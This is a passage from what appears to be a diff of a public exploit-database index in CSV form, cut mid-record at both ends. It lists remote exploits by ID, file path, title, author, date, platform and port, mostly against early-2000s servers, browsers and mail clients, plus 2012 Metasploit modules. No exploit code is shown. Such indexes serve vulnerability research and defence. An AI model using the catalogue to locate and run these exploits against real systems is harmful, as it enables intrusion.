JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",remote,windows, +21638,exploits/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 - JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",remote,multiple, +21639,exploits/windows/remote/21639.c,"VMware GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",remote,windows, +21641,exploits/cgi/remote/21641.txt,"GNU Mailman 2.0.x - Subscribe Cross-Site Scripting",2002-07-24,office,remote,cgi, +21642,exploits/cgi/remote/21642.txt,"GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting",2002-07-24,office,remote,cgi, +21643,exploits/windows/remote/21643.c,"CodeBlue 5.1 - SMTP Response Buffer Overflow",2002-07-24,doe,remote,windows, +21648,exploits/windows/remote/21648.txt,"Pegasus Mail 4.0 1 - Message Header Buffer Overflow",2002-07-24,"Auriemma Luigi",remote,windows, +21649,exploits/multiple/remote/21649.txt,"Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolved Domain Cross-Site Scripting",2002-07-24,T.Suzuki,remote,multiple, +21651,exploits/windows/remote/21651.txt,"Microsoft SQL Server 2000 - sp_MScopyscript SQL Injection",2002-07-25,"Cesar Cerrudo",remote,windows, +21652,exploits/windows/remote/21652.cpp,"Microsoft SQL Server 2000 - Resolution Service Heap Overflow",2002-07-25,"David Litchfield",remote,windows, +21654,exploits/windows/remote/21654.c,"IPSwitch IMail 6.x/7.0/7.1 - Web Messaging GET Buffer Overflow",2002-07-25,anonymous,remote,windows, +21662,exploits/windows/remote/21662.txt,"Microsoft Outlook Express 6 - '.XML' File Attachment Script Execution",2002-07-29,http-equiv,remote,windows, +21663,exploits/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,remote,linux, +21670,exploits/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,remote,windows, +21671,exploits/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow",2002-07-30,spabam,remote,unix,80 +40347,exploits/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow",2002-09-17,"Solar Eclipse",remote,unix,80 +21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows, +21677,exploits/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,remote,solaris, +21678,exploits/solaris/remote/21678.c,"Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String",2002-08-02,ghandi,remote,solaris, +21680,exploits/windows/remote/21680.pl,"Qualcomm Eudora 5 - MIME MultiPart Boundary Buffer Overflow",2002-08-05,Kanatoko,remote,windows, +21681,exploits/windows/remote/21681.html,"Opera 6.0.x - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,windows, +21682,exploits/unix/remote/21682.txt,"Mozilla 1.0/1.1 - FTP View Cross-Site Scripting",2002-08-06,"Eiji James Yoshida",remote,unix, +21692,exploits/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",remote,windows, +21693,exploits/windows/remote/21693.nasl,"Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow",2002-08-06,"Dave Aitel",remote,windows, +21695,exploits/windows/remote/21695.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (1)",2002-08-08,"Paul Szabo",remote,windows, +21696,exploits/windows/remote/21696.pl,"Qualcomm Eudora 5/6 - File Attachment Spoofing (2)",2002-08-08,"Paul Szabo",remote,windows, +21697,exploits/windows/remote/21697.txt,"Apache 2.0 - Encoded Backslash Directory Traversal",2002-08-09,"Auriemma Luigi",remote,windows, +21698,exploits/windows/remote/21698.txt,"BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting",2002-08-09,"Matt Murphy",remote,windows, +21699,exploits/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",remote,hardware, +21704,exploits/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",remote,unix, +21705,exploits/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,remote,windows, +21706,exploits/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,remote,linux, +21707,exploits/windows/remote/21707.txt,"GoAhead Web Server 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,remote,windows, +21709,exploits/windows/remote/21709.pl,"MyWebServer 1.0.2 - Search Request Remote Buffer Overflow",2002-08-14,D4rkGr3y,remote,windows, +21710,exploits/windows/remote/21710.txt,"MyWebServer 1.0.2 - Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,remote,windows, +21711,exploits/windows/remote/21711.html,"Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering",2002-08-15,http-equiv,remote,windows, +21717,exploits/windows/remote/21717.txt,"Microsoft Windows XP - HCP URI Handler Abuse",2002-08-15,"Shane Hird",remote,windows, +21718,exploits/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 - Agent Jobs Privilege Escalation",2002-08-15,"David Litchfield",remote,windows, +21719,exploits/windows/remote/21719.txt,"Apache 2.0 - Full Path Disclosure",2002-08-16,"Auriemma Luigi",remote,windows, +21722,exploits/linux/remote/21722.pl,"Lynx 2.8.x - Command Line URL CRLF Injection",2002-08-19,"Ulf Harnhammar",remote,linux, +21725,exploits/linux/remote/21725.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (1)",2002-08-19,g0thm0g,remote,linux, +21726,exploits/linux/remote/21726.c,"MySQL 3.20.32/3.22.x/3.23.x - Null Root Password Weak Default Configuration (2)",2002-10-05,st0ic,remote,linux, +21731,exploits/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 - POST Arbitrary Perl Code Execution",2002-08-20,"Dan Elder",remote,novell, +21734,exploits/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting",2002-08-21,Skinnay,remote,unix, +21735,exploits/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",remote,windows, +21748,exploits/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",remote,windows, +21749,exploits/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 - XML Redirect File Disclosure",2002-08-23,"GreyMagic Software",remote,windows, +21750,exploits/windows/remote/21750.txt,"Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)",2002-04-16,"GreyMagic Software",remote,windows, +21751,exploits/multiple/remote/21751.txt,"Blazix 1.2 - Special Character Handling Server Side Script Information Disclosure",2002-08-24,"Auriemma Luigi",remote,multiple, +21752,exploits/multiple/remote/21752.txt,"Blazix 1.2 - Password Protected Directory Information Disclosure",2002-08-25,"Auriemma Luigi",remote,multiple, +21753,exploits/windows/remote/21753.txt,"OmniHTTPd 1.1/2.0.x/2.4 - 'test.php' Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",remote,windows, +21754,exploits/windows/remote/21754.txt,"OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting",2002-08-26,"Matthew Murphy",remote,windows, +21757,exploits/windows/remote/21757.txt,"OmniHTTPd 1.1/2.0.x/2.4 - Sample Application URL Encoded Newline HTML Injection",2002-08-26,"Matthew Murphy",remote,windows, +21759,exploits/windows/remote/21759.txt,"mIRC 6.0 - Scripting ASCTime Buffer Overflow",2002-08-27,"James Martin",remote,windows, +21764,exploits/windows/remote/21764.txt,"Microsoft Word 95/97/98/2000/2002 / Excel 2002 - INCLUDETEXT Document Sharing File Disclosure",2002-08-26,"Alex Gantman",remote,windows, +21765,exploits/linux/remote/21765.pl,"Webmin 0.x - 'RPC' Privilege Escalation",2002-08-28,"Noam Rathaus",remote,linux, +21767,exploits/multiple/remote/21767.txt,"NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting",2002-09-02,"Matthew Murphy",remote,multiple, +21777,exploits/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",remote,windows, +21784,exploits/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,remote,linux, +21794,exploits/windows/remote/21794.txt,"Savant Web Server 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",remote,windows, +21800,exploits/multiple/remote/21800.txt,"DB4Web 3.4/3.6 - File Disclosure",2002-09-17,"Stefan Bagdohn",remote,multiple, +21801,exploits/multiple/remote/21801.txt,"DB4Web 3.4/3.6 - Connection Proxy",2002-09-17,"Stefan Bagdohn",remote,multiple, +21803,exploits/windows/remote/21803.txt,"Microsoft Internet Explorer 6 - URI Handler Restriction Circumvention",2002-09-10,"Thor Larholm",remote,windows, +21804,exploits/windows/remote/21804.c,"Trillian 0.6351/0.7x - Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",remote,windows, +21808,exploits/windows/remote/21808.txt,"Microsoft VM 2000/3000/3100/3188/3200/3300/3802/3805 series - JDBC Class Code Execution",2002-09-19,anonymous,remote,windows, +21810,exploits/windows/remote/21810.c,"Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow",2002-09-19,"Lance Fitz-Herbert",remote,windows, +21812,exploits/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - 'INCLUDEPICTURE' Document Sharing File Disclosure",2002-09-20,"Richard Edwards",remote,windows, +21818,exploits/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,remote,linux, +21882,exploits/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure",2002-10-01,"HP Security",remote,unix, +21883,exploits/windows/remote/21883.html,"Microsoft Internet Explorer 5 - Document Reference Zone Bypass",2002-10-01,"Liu Die Yu",remote,windows, +21885,exploits/multiple/remote/21885.txt,"Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting",2002-10-02,mattmurphy,remote,multiple, +21827,exploits/hardware/remote/21827.txt,"HP Compaq Insight Manager - Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",remote,hardware, +21837,exploits/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-10-10,Metasploit,remote,windows,4322 +21838,exploits/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Remote Buffer Overflow (Metasploit)",2012-10-10,Metasploit,remote,windows,3217 +21839,exploits/windows/remote/21839.rb,"NTR - ActiveX Control 'StopModule()' Remote Code Execution (Metasploit)",2012-10-10,Metasploit,remote,windows, +21840,exploits/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)",2012-10-10,Metasploit,remote,windows, +21841,exploits/windows/remote/21841.rb,"NTR - ActiveX Control 'Check()' Method Buffer Overflow (Metasploit)",2012-10-10,Metasploit,remote,windows, +21842,exploits/windows/remote/21842.rb,"HP Application Lifecycle Management - 'XGO.ocx' ActiveX 'SetShapeNodeType()' Remote Code Execution (Metasploit)",2012-10-10,Metasploit,remote,windows, +21846,exploits/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution (Metasploit)",2012-10-10,Metasploit,remote,java,7001 +21847,exploits/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - 'ImageUpload.ashx' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,remote,windows, +21849,exploits/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution (Metasploit)",2012-10-10,Metasploit,remote,unix,444 +21850,exploits/linux/remote/21850.rb,"Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit)",2012-10-10,Metasploit,remote,linux, +21851,exploits/unix/remote/21851.rb,"Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)",2012-10-10,Metasploit,remote,unix,10000 +21852,exploits/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution (Metasploit)",2012-10-10,Metasploit,remote,unix, +21853,exploits/unix/remote/21853.txt,"Apache Tomcat 3/4 - 'DefaultServlet' File Disclosure",2002-09-24,"Rossen Raykov",remote,unix, +21857,exploits/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,remote,linux, +21858,exploits/linux/remote/21858.txt,"ACWeb 1.14/1.8 - Cross-Site Scripting",2002-09-25,DownBload,remote,linux, +21868,exploits/ios/remote/21868.rb,"Apple iOS Mobile Safari - LibTIFF Buffer Overflow (Metasploit)",2012-10-09,Metasploit,remote,ios, +21869,exploits/ios/remote/21869.rb,"Apple iOS Mobile Mail - LibTIFF Buffer Overflow (Metasploit)",2012-10-09,Metasploit,remote,ios, +21870,exploits/linux/remote/21870.txt,"Zope 2.x - Incorrect XML-RPC Request Information Disclosure",2002-09-26,"Rossen Raykov",remote,linux, +21876,exploits/multiple/remote/21876.txt,"SafeTP 1.46 - Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",remote,multiple, +21880,exploits/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,remote,multiple, +21888,exploits/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,remote,windows, +21897,exploits/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",remote,windows, +21898,exploits/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",remote,windows, +21902,exploits/windows/remote/21902.c,"Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,remote,windows, +21910,exploits/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,remote,windows, +21913,exploits/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,remote,windows, +21919,exploits/unix/remote/21919.sh,"Sendmail 8.12.6 - Compromised Source Backdoor",2002-10-08,netmask,remote,unix, +21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple, +21932,exploits/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",remote,windows, +21934,exploits/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",remote,linux, +21936,exploits/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,remote,linux, +21937,exploits/linux/remote/21937.c,"ghttpd 1.4.x - 'Log()' Remote Buffer Overflow",2002-10-07,flea,remote,linux, +21940,exploits/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",remote,windows, +21942,exploits/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",remote,multiple, +21944,exploits/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,remote,hardware, +21945,exploits/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",remote,linux, +21947,exploits/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,remote,unix, +21948,exploits/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,remote,unix, +21955,exploits/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,remote,windows, +21958,exploits/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",remote,windows, +21959,exploits/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",remote,windows, +21964,exploits/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",remote,windows, +21974,exploits/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",remote,unix, +21983,exploits/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",remote,hardware, +21993,exploits/php/remote/21993.rb,"AjaXplorer - 'checkInstall.php' Remote Command Execution (Metasploit)",2012-10-16,Metasploit,remote,php, +21996,exploits/multiple/remote/21996.txt,"Lotus Domino 5.0.8-9 - Non-Existent NSF Database Banner Information Disclosure",2002-11-07,"Frank Perreault",remote,multiple, +21997,exploits/windows/remote/21997.txt,"Perception LiteServe 2.0.1 - DNS Wildcard Cross-Site Scripting",2002-11-08,"Matthew Murphy",remote,windows, +21998,exploits/linux/remote/21998.c,"CGIEmail 1.6 - Remote Buffer Overflow",2001-09-11,isox,remote,linux, +21999,exploits/windows/remote/21999.txt,"Perception LiteServe 2.0.1 - Directory Query String Cross-Site Scripting",2002-11-08,"Matthew Murphy",remote,windows, +22000,exploits/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,remote,cgi, +22001,exploits/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",remote,windows, +22007,exploits/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",remote,windows, +22012,exploits/linux/remote/22012.c,"Light HTTPd 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,remote,linux, +22013,exploits/linux/remote/22013.c,"Light HTTPd 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,remote,linux, +22016,exploits/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,remote,linux, +22018,exploits/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,remote,windows, +22020,exploits/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,remote,multiple, +22021,exploits/linux/remote/22021.sh,"Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow",2002-11-16,"dong-h0un U",remote,linux, +22022,exploits/windows/remote/22022.txt,"Macromedia Flash 6.0.47.0 - SWRemote Heap Corruption",2002-11-18,LOM,remote,windows, +22023,exploits/windows/remote/22023.c,"MailEnable 1.501x - Email Server Buffer Overflow",2002-11-18,redsand,remote,windows, +22024,exploits/windows/remote/22024.txt,"TFTPD32 2.50 - Arbitrary File Download/Upload",2002-11-18,"Aviram Jenik",remote,windows, +22025,exploits/windows/remote/22025.pl,"TFTPD32 2.50 - 'Filename' Remote Buffer Overflow",2002-11-19,"Aviram Jenik",remote,windows, +22026,exploits/linux/remote/22026.txt,"Mhonarc 2.5.x - Mail Header HTML Injection",2002-11-19,"Steven Christey",remote,linux, +22027,exploits/windows/remote/22027.txt,"Microsoft Java Virtual Machine 3802 Series - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",remote,windows, +22028,exploits/windows/remote/22028.txt,"Symantec Java! JustInTime Compiler 210.65 - Command Execution",2002-11-21,"Last Stage of Delirium",remote,windows, +22029,exploits/multiple/remote/22029.txt,"Sun/Netscape Java Virtual Machine1.x - Bytecode Verifier",2002-11-21,"Last Stage of Delirium",remote,multiple, +22032,exploits/windows/remote/22032.txt,"acFTP 1.4 - Invalid Password Weak Authentication",2002-11-25,"Matthew Murphy",remote,windows, +22034,exploits/linux/remote/22034.pl,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (1)",2002-11-25,"Damian Myerscough",remote,linux, +22035,exploits/linux/remote/22035.c,"WSMP3 0.0.1/0.0.2 - Remote Heap Corruption (2)",2002-11-25,Xpl017Elz,remote,linux, +22036,exploits/unix/remote/22036.pl,"XFree86 X11R6 3.3.x - Font Server Remote Buffer Overrun",2002-11-25,"TESO Security",remote,unix, +22046,exploits/linux/remote/22046.c,"Null HTTPd 0.5 - Remote Heap Corruption",2002-11-26,eSDee,remote,linux, +22049,exploits/unix/remote/22049.c,"Lib CGI 0.1 - Include Buffer Overflow",2002-11-27,Xpl017Elz,remote,unix, +22054,exploits/cgi/remote/22054.c,"Boozt Standard 0.9.8 - 'index.cgi' Buffer Overrun",2002-11-29,BrainStorm,remote,cgi, +22057,exploits/linux/remote/22057.pl,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (1)",2002-11-30,Sapient2003,remote,linux, +22058,exploits/linux/remote/22058.c,"Pserv 2.0 - User-Agent HTTP Header Buffer Overflow (2)",2002-11-30,jsk,remote,linux, +22063,exploits/linux/remote/22063.c,"Zeroo HTTP Server 1.5 - Directory Traversal (1)",2002-11-22,mikecc,remote,linux, +22064,exploits/linux/remote/22064.pl,"Zeroo HTTP Server 1.5 - Directory Traversal (2)",2002-11-22,mattmurphy,remote,linux, +22078,exploits/windows/remote/22078.txt,"Mollensoft Software Enceladus Server Suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,remote,windows, +22082,exploits/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 - Mail Scanner Buffer Overflow",2002-12-10,"Joel Soderberg",remote,windows, +22084,exploits/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - 'COM_CHANGE_USER' Password Length Account",2002-12-16,Andi,remote,unix, +22085,exploits/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",remote,unix, +22091,exploits/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",remote,linux, +22093,exploits/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,remote,multiple, +22094,exploits/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,remote,windows, +22101,exploits/linux/remote/22101.c,"zkfingerd 0.9.1 - 'say()' Format String",2002-12-16,"Marceta Milos",remote,linux, +22106,exploits/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,remote,linux, +22112,exploits/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",remote,windows, +22113,exploits/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",remote,windows, +22129,exploits/linux/remote/22129.c,"H-Sphere WebShell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",remote,linux, +22130,exploits/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,remote,multiple, +22131,exploits/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",remote,bsd, +22135,exploits/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",remote,linux, +22136,exploits/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 - Directory Traversal",2003-01-07,"Dennis Rand",remote,windows, +22138,exploits/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow",2003-01-10,greuff@void.at,remote,multiple, +22139,exploits/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String",2003-01-10,greuff@void.at,remote,multiple, +22140,exploits/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String",2003-01-10,greuff@void.at,remote,multiple, +22141,exploits/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String",2003-01-10,greuff,remote,linux, +22142,exploits/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String",2003-01-10,greuff,remote,windows, +22143,exploits/linux/remote/22143.txt,"BRS Webweaver 1.0 1 - MKDir Directory Traversal",2003-01-10,euronymous,remote,linux, +22144,exploits/windows/remote/22144.txt,"Xynph FTP Server 1.0 - Directory Traversal",2003-01-11,"Zero-X www.lobnan.de Team",remote,windows, +22145,exploits/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 - Daemon Mode Remote Command Execution",2003-01-11,"Maurycy Prodeus",remote,multiple, +22147,exploits/linux/remote/22147.c,"mpg123 pre0.59s - Invalid MP3 Header Memory Corruption",2003-01-13,"Gobbles Security",remote,linux, +22161,exploits/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,remote,windows,21 +22171,exploits/windows/remote/22171.txt,"Trend Micro OfficeScan 3.x - CGI Directory Insufficient Permissions",2003-01-15,"Rod Boron",remote,windows, +22173,exploits/windows/remote/22173.txt,"Trend Micro Virus Control System 1.8 - Information Disclosure",2003-01-15,"Rod Boron",remote,windows, +22174,exploits/windows/remote/22174.txt,"Trend Micro ScanMail For Exchange 3.8 - Authentication Bypass",2003-01-15,"Rod Boron",remote,windows, +22178,exploits/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",remote,multiple, +22179,exploits/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",remote,multiple, +22184,exploits/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,remote,windows, +22185,exploits/windows/remote/22185.txt,"Sambar Server 5.x - 'results.stm' Cross-Site Scripting",2003-01-20,galiarept,remote,windows, +22187,exploits/linux/remote/22187.txt,"CVS 1.11.x - Directory Request Double-Free Heap Corruption",2003-01-20,"Stefan Esser",remote,linux, +22194,exploits/windows/remote/22194.txt,"Microsoft Windows XP/2000/NT 4.0 - Locator Service Buffer Overflow",2003-01-22,"David Litchfield",remote,windows, +22200,exploits/multiple/remote/22200.txt,"SyGate 5.0 - Insecure UDP Source Port Firewall Bypass Weak Default Configuration",2003-01-24,"David Fernández",remote,multiple, +22201,exploits/multiple/remote/22201.txt,"List Site Pro 2.0 - User Database Delimiter Injection",2003-01-24,Statix,remote,multiple, +22205,exploits/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory / File Disclosure",2003-01-26,"Jouko Pynnönen",remote,linux, +22213,exploits/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",remote,windows, +22217,exploits/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",remote,windows, +22218,exploits/windows/remote/22218.txt,"Opera 7.0 - History Object Information Disclosure",2003-02-04,"GreyMagic Software",remote,windows, +22219,exploits/windows/remote/22219.txt,"Opera 7.0 - Error Message History Disclosure",2003-02-04,"GreyMagic Software",remote,windows, +22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",remote,multiple, +22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",remote,windows, +22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",remote,windows, +22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware, +22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware, +22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,remote,multiple, +22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",remote,linux, +22269,exploits/windows/remote/22269.txt,"Sage 1.0 Beta 3 - Content Management System Full Path Disclosure",2003-02-20,euronymous,remote,windows, +22270,exploits/windows/remote/22270.txt,"Sage 1.0 Beta 3 - Content Management System Cross-Site Scripting",2003-02-20,euronymous,remote,windows, +22271,exploits/hardware/remote/22271.c,"Cisco IOS 11/12 - OSPF Neighbor Buffer Overflow",2003-02-20,FX,remote,hardware, +22274,exploits/linux/remote/22274.c,"Zlib 1.1.4 - Compression Library 'gzprintf()' 